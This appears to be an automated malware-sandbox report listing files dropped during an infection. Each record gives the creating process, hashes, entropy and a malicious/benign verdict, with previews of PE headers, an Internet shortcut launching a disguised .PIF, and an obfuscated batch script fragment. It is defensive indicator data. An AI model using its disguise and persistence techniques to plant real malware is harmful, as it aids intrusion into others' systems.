                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:xsFfc1VyFn5UQn652bO4HKsqjnhMgeiCl7G0nehbGZpbD:xsFcIn5rJoDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3E53C60E7F0265011CABF5DEF87FC0A0
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A1EAED8817FD911A6060E2C6E9CEDC7FDB2895F6
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E827A8B2F8D34B39F6FEDA6D83F37C7D0FEC3223F60EB2BE35897AE8A2C6E1EB
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D18168F9DD7B63F4C53619979B366EDF6642D5DC2475BFE80B01F906B3E07055F985D6EA3E21CE3C6E2E10CC2AFDCD45E461915AD454B1E66695D8C75645C8CA
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1246208
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.494289177093508
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:jt9o6p4xQbiKI69wpemIwpel9FsqjnhMgeiCl7G0nehbGZpbD:jt9faQbtl2peapelbDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:982308B395280AF06BC46630B8DC127F
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:93400962F5605E871DEB1211B57EB5C9BD4E0D08
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:03789DEA7BB90ED0621EC0BB4B31F7443619F575A6EAB96679FE5C2129D73457
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4FF30A70E5A5A98B6A45DFE72F3B7191AA06E298C4999AE7E7FC6FD182F938E28EAE9DB48DF68FB84CB423324041FD82023EAD81AFC45F9FB310A0344A15CE4E
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1356800
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.347849761549814
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:4QVTZu0JSsqjnhMgeiCl7G0nehbGZpbD:3VTZurDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9AC1B93FAE4F9A57BE493FC216923D05
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:AC04DDB51B0F7A5CC89663AFB6DB0DF7D24293DC
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9351E984C5C64CACD419E31FD21C7638668F0C1EFE6BC12E8B11C89A242A961D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1842F5C5F21DC620BE82B064A477204B5E0D2D014A188EC472D70F0229B9EB614184D8D84E19AEC38BC1BE96AED9E0D32AF84428E369C3B5FBF7A540479CE7C0
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1344000
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.808382778321267
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:LC1vpgXcZHzMsqjnhMgeiCl7G0nehbGZpbD:LC1vpIcN4Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:CC083C4C6A79DECDF1961A9BAD5C8FB1
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D5C04F1A01B6A3C49C36DA84A3C77AED6B43A9AD
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:8408588576981A92177E12004451914C716CCE1B07600E58C7E55B19112B4CC9
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D135A312F3E46899E7D2B16B8377E3A57D8E0D3573BF6DE8A5661B253F9D17E6295E8DA3171A8D688A4EA4772CE47878093A8E80328C098630D8B0FD7C9B90D5
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1200128
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.140042067424111
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:qSwjQXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:qvQsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:59BAE5AF7AC3AAC8CADB9C9906EEFC7E
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:1FA376CA5DD8DE9B5E54E4EC191AD658BF03BCDA
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:140F27706CA18EFF20A2A238CA57331D221FBF32488706E498FFDCBEC81CAABE
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:002438FADE0E1A45A37A7897A3CDCAD248DFC7BCF3EA4AC4743620BDF1F614B99B30C3476200FC882DF7A44892E5B1A27E55997F96E4EA96B41E3A57F1259AA5
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1408512
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.441174599903948
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:PWKntIfGpCsqjnhMgeiCl7G0nehbGZpbD:u8IeADmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DD1D7A4A9DD65BD14BE6CFBA4C3E242D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:001A9136922FE6A947B2E6E3197EFC282200AFD9
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A3E685042A6908ADAFC55FB70D5DE155F8309A3827E1D3F7839ADD1DA4C801B3
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:7803F3BACB14A9A7F7896085F84FCC2FF0DADBEACA5B018C92DFFEF7C03B5D986BA7767328A16D6D81551A332CBD585EFA822EF922FFF259FBFE02BC09C5E21C
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@......................................... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...P.......@...>..............@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1185280
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.1033029375397
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:1IhEXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:QEsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D631FA2156162FB80245634719409624
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F1BCCF0649001C1DBDF8F91AFEDB13DCE4092A73
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E912E2EAD8142FA8408063BBA815177813DBD5102D3E6BE574E4B74ABAF0D420
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4839854012C2A8410574B1CA84496DD2E7C9B5FF15E47E80FE02E32FF509C7005A7AE854730E519369F55486D3192B98B11E960F97B82502E2BE8BA0E60AA248
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@....................................w..... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1531904
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.421217604990358
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:s8oREwt2ioQ3J+R1sqjnhMgeiCl7G0nehbGZpbD:s8oRpoFpDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2CE6205186B8ED216F01B11A4CB92ABF
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:296A6CE708F9CACE1DDBC66EE838D1806DE531D3
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:EB6DEAEEB202DA204C1BBB1F7ECBDD1CC3F38A1DC9F6FDB6C30F1438ECF4CE51
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:2B23AFC906C16963820D3FE8989E8C94F1656133598524BB97088A11DA275B08D0589ADB36B00AE042988D8E16BE6B75ACE05B93378D865CA71AE0AE8AD5AB55
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@....................................I..... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc...P.......@... ..............@...........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\Public\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2452482
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.685285557765028
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:hgOlTs4SJ+BGgNxe63T3vTmhKA8RZegxG:Q
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:04AD7E38AA2F399B5862E6267697632A
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A30E9C94BB215F0B96A651432F8F74F4A06284DE
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:DA4101EBA193661F3016D2B4B6328CF8D0CB16AC58C1470683BC07D8BAF34EBE
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B7CACC98C0D5C7B3F03CDE8B294CB6534BE25C560E78C6CF5304285774B56493E98346152A587162D1347EDDC7F751BD164A78DD257383B0B59B37D89D6BA5A8
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Juqmtmya.PIF">), ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):104
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.168706785966594
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMsiBsOsbxqV19Iov:HRYFVmTWDyzmBsOExubIy
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:AF3D350E64B6E92F878DCD271014658C
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C4F0893B99C22C06E8B7464A140C847E10F9533D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0CAEB9DB82E69A560740E26D1715396469C2949F9B2A643D6067443CEE3B8F55
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3E32503934D42B68F7CC8ECABC421BA673D95A73AF25A9B9BFA7E2F96A8A51D5CC945C7F219D05A40317395E713560076CA36D8A6D37F2206AD7A30061E48DA4
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Juqmtmya.PIF"..IconIndex=922160..HotKey=23..
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\Public\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1226240
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.728338717271886
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:IYSEI2pcNM1rQrHdo/QmTsEJX+2CkEpV4gMU/u8pL3bLccgQJwxVqb1gsNSrAjEy:IbK/QmoEJX+2CkEpV4gMU/uSLIam6Q
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2EF70D96354CC04D9168E8F69E7B17A0
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:92EEE1BB5DE4F4D50805101B83E4A3A1A602856B
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5842B3E5271EFED831BF21F4821431BB1A7DCC94BAFAB135B62D34BFDB32F503
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3C46F059B5E2C806EFDFEA71DAD8BCC236BFC753DC3B15E637D6697231313B68232D0F4BC6921B41ED76F2471891718678EC7B6C6DDA0A5D7C9F7AE8A57580B3
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2386716
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.750563994554051
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:y4lGgAK/eHLG7HcOEPQW1LM9Cwyq7uP6yIFBlZ:ppAqyGTE1o9PPyOBlZ
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:5E9E591803218A9803C8F7B2C63DD663
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8711875A288EBD187AFFE45CD31EC8E55D05FDB1
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BD53A567B8ED172FE46F5396276B2FA285CB9FCE1748411EB42960833CBC9A93
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:407B99B5AA46998EECCEED92484C0BDFE86EF56FA9AB1BAC83F13B3615EF1CCC898B0DEEC6A02F1659637B6723AE474781955E7A5EB8B28450210C734BE4503E
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1226240
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.728338717271886
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:IYSEI2pcNM1rQrHdo/QmTsEJX+2CkEpV4gMU/u8pL3bLccgQJwxVqb1gsNSrAjEy:IbK/QmoEJX+2CkEpV4gMU/uSLIam6Q
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2EF70D96354CC04D9168E8F69E7B17A0
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:92EEE1BB5DE4F4D50805101B83E4A3A1A602856B
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5842B3E5271EFED831BF21F4821431BB1A7DCC94BAFAB135B62D34BFDB32F503
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3C46F059B5E2C806EFDFEA71DAD8BCC236BFC753DC3B15E637D6697231313B68232D0F4BC6921B41ED76F2471891718678EC7B6C6DDA0A5D7C9F7AE8A57580B3
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.0
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:Eovn:Eov
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:056960930E28DB14EAA54F2A494F8625
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:1550D1D630F292833CC5B4F251923B5A27B99BE0
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5A7CAAD39BADD4848563FE7402F185C7E1FF0A8416B2DBCE8FEF86137B2D79C3
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:61C084B6061CCC127C44255F4F2801D638753ABD91D698B45FB8BCAE4F46A1AB491F95E7C210F561316A733372CBB04F10D6BE4D08AACB1ACB7B7030085A46FF
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:18..
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):62357
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.705712327109906
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B87F096CBC25570329E2BB59FEE57580
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):68096
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.328046551801531
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\extrac32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):289792
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.135598950357573
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):236544
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.4416694948877025
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\extrac32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1651712
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.144018815244304
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:MeiElH5YZ5cv6r3HiaZQ8p4XGwiJDgN7MaikGLIsWWi4pT/Y/7hsyDAP760MKR:Me3lZYUvmSu4XTckYD0sWWiwT/MhTzK
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F17616EC0522FC5633151F7CAA278CAA
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:79890525360928A674D6AEF11F4EDE31143EEC0D
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D252235AA420B91C38BFEEC4F1C3F3434BC853D04635453648B26B2947352889
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3ED65172159CD1BCC96B5A0B41D3332DE33A631A167CE8EE8FC43F519BB3E2383A58737A41D25AA694513A68C639F0563A395CD18063975136DE1988094E9EF7
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
